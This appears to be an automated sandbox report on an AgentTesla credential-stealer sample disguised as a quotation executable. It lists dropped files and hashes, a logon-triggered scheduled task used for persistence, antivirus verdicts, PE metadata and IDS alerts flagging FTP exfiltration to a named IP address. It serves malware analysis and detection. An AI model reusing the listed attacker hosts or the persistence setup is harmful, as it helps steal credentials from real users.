                                      8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                                      • 104.26.12.205
                                      GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 104.26.12.205
                                      GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 104.26.12.205
                                      1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 104.26.12.205
                                      Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.26.12.205
                                      RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                      • 104.26.12.205
                                      RTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                      • 104.26.12.205
                                      No context
                                      Process:C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                      Process:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:true
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                      Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):2232
                                      Entropy (8bit):5.380805901110357
                                      Encrypted:false
                                      SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//Z+Uyus:lGLHyIFKL3IZ2KRH9OugIs
                                      MD5:BB0D009D716C19EF3E3D871F7E5615A7
                                      SHA1:24A3A9549BBF1704F44604631DF92D78D48ED3B5
                                      SHA-256:CAD65E7B83D76910680E43406ED1EEF6BB6CDC27ED79E3462EDD5F90CFD37F05
                                      SHA-512:D3159537188A4AE3F51CA245E63DAFDFA286D6172573847371382F84A4B5F819730B03F4A541BBEAAC022F20F283B92127C526A675FEB1D33636FF17CBDD0C17
                                      Malicious:false
                                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                                      File Type:XML 1.0 document, ASCII text
                                      Category:dropped
                                      Size (bytes):1575
                                      Entropy (8bit):5.11956975542299
                                      Encrypted:false
                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta6xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTZv
                                      MD5:0BC1179F57AA1484371BB1B435F4BD7D
                                      SHA1:CB4BE3E603D898E3F1839E3C1FCBFC5E1F90107F
                                      SHA-256:C1F88BCE4E2860F745C5F16ED6C6E97F8B3BB651A8EE4BBFB37FC2B558A1EDC5
                                      SHA-512:A56D005FCCC977E55701CDEA3B88DF0AC337420BFA3CFCB7F016149CA70C0A7EEFEAE9A8E499D1C14D005163E9BC6BB783E093D73B7673687DCDC68DFD84BC9A
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                      Process:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      File Type:XML 1.0 document, ASCII text
                                      Category:dropped
                                      Size (bytes):1575
                                      Entropy (8bit):5.11956975542299
                                      Encrypted:false
                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta6xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTZv
                                      MD5:0BC1179F57AA1484371BB1B435F4BD7D
                                      SHA1:CB4BE3E603D898E3F1839E3C1FCBFC5E1F90107F
                                      SHA-256:C1F88BCE4E2860F745C5F16ED6C6E97F8B3BB651A8EE4BBFB37FC2B558A1EDC5
                                      SHA-512:A56D005FCCC977E55701CDEA3B88DF0AC337420BFA3CFCB7F016149CA70C0A7EEFEAE9A8E499D1C14D005163E9BC6BB783E093D73B7673687DCDC68DFD84BC9A
                                      Malicious:true
                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                      Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      File Type:XML 1.0 document, ASCII text
                                      Category:dropped
                                      Size (bytes):1575
                                      Entropy (8bit):5.11956975542299
                                      Encrypted:false
                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta6xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTZv
                                      MD5:0BC1179F57AA1484371BB1B435F4BD7D
                                      SHA1:CB4BE3E603D898E3F1839E3C1FCBFC5E1F90107F
                                      SHA-256:C1F88BCE4E2860F745C5F16ED6C6E97F8B3BB651A8EE4BBFB37FC2B558A1EDC5
                                      SHA-512:A56D005FCCC977E55701CDEA3B88DF0AC337420BFA3CFCB7F016149CA70C0A7EEFEAE9A8E499D1C14D005163E9BC6BB783E093D73B7673687DCDC68DFD84BC9A
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                      Process:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):645120
                                      Entropy (8bit):7.93913808186164
                                      Encrypted:false
                                      SSDEEP:12288:rWVw0rZbRJNrpBr6NM+2543sxKNEV28KddaEWtyef:ydbRXpBraM+2W3EKc2gxtx
                                      MD5:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      SHA1:DE74DBF7BAC85A3A06C7038A4D4241389E6A5C8F
                                      SHA-256:FDA83ECB5BD6A07DEDAF6BE0FCE7C626E21E9DF94D82DDB905460E9D6A25A162
                                      SHA-512:661CDEE4EFE389DAC6AB7D8F5CF92A04403E7B6934942E18B4D2E5A7C609DF58EEA44D2E85EBB9592BF8544BC89C543CC7F01A2E67E0D1041AA22654CCBF124C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 58%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".f................................. ........@.. .......................@............@.....................................W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......d...0?......2....................................................0..A....... :........%.@...(.....A... .........%.'...(.....(...( ...*.....&*.....{....*"..}....*....0..h...............%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%..r...p.}....+..(.....*.0..{.............%.....(.................. ....... .-..... .,..... *=..... .7..... .+..... v...... .$....................( ...*.....&*..0..Y.......~A.....~(.....+Z..E................m...4....
                                      Process:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      Process:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):645120
                                      Entropy (8bit):7.93913808186164
                                      Encrypted:false
                                      SSDEEP:12288:rWVw0rZbRJNrpBr6NM+2543sxKNEV28KddaEWtyef:ydbRXpBraM+2W3EKc2gxtx
                                      MD5:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      SHA1:DE74DBF7BAC85A3A06C7038A4D4241389E6A5C8F
                                      SHA-256:FDA83ECB5BD6A07DEDAF6BE0FCE7C626E21E9DF94D82DDB905460E9D6A25A162
                                      SHA-512:661CDEE4EFE389DAC6AB7D8F5CF92A04403E7B6934942E18B4D2E5A7C609DF58EEA44D2E85EBB9592BF8544BC89C543CC7F01A2E67E0D1041AA22654CCBF124C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 58%
                                      Process:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.93913808186164
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:rQuotation3200025006.exe
                                      File size:645'120 bytes
                                      MD5:36c4bff0f1cdcda62da9229500ca1e38
                                      SHA1:de74dbf7bac85a3a06c7038a4d4241389e6a5c8f
                                      SHA256:fda83ecb5bd6a07dedaf6be0fce7c626e21e9df94d82ddb905460e9d6a25a162
                                      SHA512:661cdee4efe389dac6ab7d8f5cf92a04403e7b6934942e18b4d2e5a7c609df58eea44d2e85ebb9592bf8544bc89c543cc7f01a2e67e0d1041aa22654ccbf124c
                                      SSDEEP:12288:rWVw0rZbRJNrpBr6NM+2543sxKNEV28KddaEWtyef:ydbRXpBraM+2W3EKc2gxtx
                                      TLSH:59D423CC77AA8E36EA7C87B60462541813F364C59213FA0D5F8A35CA2E577CCA589F13
                                      Icon Hash:90cececece8e8eb0
                                      Entrypoint:0x49edee
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66F622F9 [Fri Sep 27 03:14:01 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      Name                                  Virtual Address  Virtual Size  Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT          0x9ed94          0x57          .text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa0000          0x600         .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC       0xa2000          0xc           .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                      Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
                                      .text   0x2000           0x9cdf4       0x9ce00   e78b011486a082e9197e2d965fb514b0  False     0.9600550921314741   data       7.946103748533992    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc   0xa0000          0x600         0x600     73346f2547818793e4e1f6f605b9d794  False     0.4225260416666667   data       4.11143285591599     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc  0xa2000          0xc           0x200     b70c11876092b370c3eeffc8aa726bbc  False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      Name         RVA      Size   Type                                                                               Language  Country  ZLIB Complexity
                                      RT_VERSION   0xa0090  0x32c  data                                                                                                  0.42980295566502463
                                      RT_MANIFEST  0xa03cc  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
                                      DLL          Import
                                      mscoree.dll  _CorExeMain
                                      Timestamp                        SID      Signature                                     Severity  Source IP    Source Port  Dest IP       Dest Port  Protocol
                                      2024-09-27T13:10:17.718048+0200  2029927  ET MALWARE AgentTesla Exfil via FTP           1         192.168.2.4  49741        110.4.45.197  21         TCP
                                      2024-09-27T13:10:19.571041+0200  2855542  ETPRO MALWARE Agent Tesla CnC Exfil Activity  1         192.168.2.4  49746        110.4.45.197  53334      TCP
                                      2024-09-27T13:10:19.576306+0200  2855542  ETPRO MALWARE Agent Tesla CnC Exfil Activity  1         192.168.2.4  49746        110.4.45.197  53334      TCP
                                      2024-09-27T13:10:24.710806+0200  2029927  ET MALWARE AgentTesla Exfil via FTP           1         192.168.2.4  49751        110.4.45.197  21         TCP
                                      2024-09-27T13:10:25.537921+0200  2855542  ETPRO MALWARE Agent Tesla CnC Exfil Activity  1         192.168.2.4  49753        110.4.45.197  51497      TCP
                                      2024-09-27T13:10:25.543689+0200  2855542  ETPRO MALWARE Agent Tesla CnC Exfil Activity  1         192.168.2.4  49753        110.4.45.197  51497      TCP
                                      2024-09-27T13:10:31.146663+0200  2029927  ET MALWARE AgentTesla Exfil via FTP           1         192.168.2.4  49756        110.4.45.197  21         TCP
                                      2024-09-27T13:10:31.976691+0200  2855542  ETPRO MALWARE Agent Tesla CnC Exfil Activity  1         192.168.2.4  49757        110.4.45.197  55730      TCP
                                      2024-09-27T13:10:31.982121+0200  2855542  ETPRO MALWARE Agent Tesla CnC Exfil Activity  1         192.168.2.4  49757        110.4.45.197  55730      TCP
                                      Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                      Sep 27, 2024 13:10:21.281246901 CEST44349748104.26.12.205192.168.2.4
                                      Sep 27, 2024 13:10:21.281387091 CEST49748443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:21.283852100 CEST49748443192.168.2.4104.26.12.205
                                      Sep 27, 2024 13:10:21.284106016 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:21.284137011 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:21.284158945 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:21.284311056 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:21.336075068 CEST4975059960192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:21.340892076 CEST5996049750110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:21.340964079 CEST4975059960192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:21.341022015 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:21.345844984 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:21.858325005 CEST4975121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:21.863250017 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:21.863333941 CEST4975121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:22.180212975 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:22.180468082 CEST4975059960192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:22.180468082 CEST4975059960192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:22.185501099 CEST5996049750110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:22.185558081 CEST5996049750110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:22.185570955 CEST5996049750110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:22.185951948 CEST5996049750110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:22.186067104 CEST4975059960192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:22.224679947 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:22.513676882 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:22.516904116 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:22.521747112 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:22.701957941 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:22.702133894 CEST4975121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:22.707009077 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:22.847029924 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:22.847414970 CEST4975265186192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:22.852679014 CEST6518649752110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:22.852802038 CEST4975265186192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:22.852849007 CEST4974121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:22.857779026 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:23.032072067 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:23.032488108 CEST4975121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:23.037455082 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:23.385102034 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:23.385229111 CEST4975121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:23.390089989 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:23.682950020 CEST2149741110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:23.686599016 CEST4975265186192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:23.691596985 CEST6518649752110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:23.691737890 CEST6518649752110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:23.691812038 CEST4975265186192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:23.715152979 CEST2149751110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:10:23.715291977 CEST4975121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:10:23.722523928 CEST2149751110.4.45.197192.168.2.4
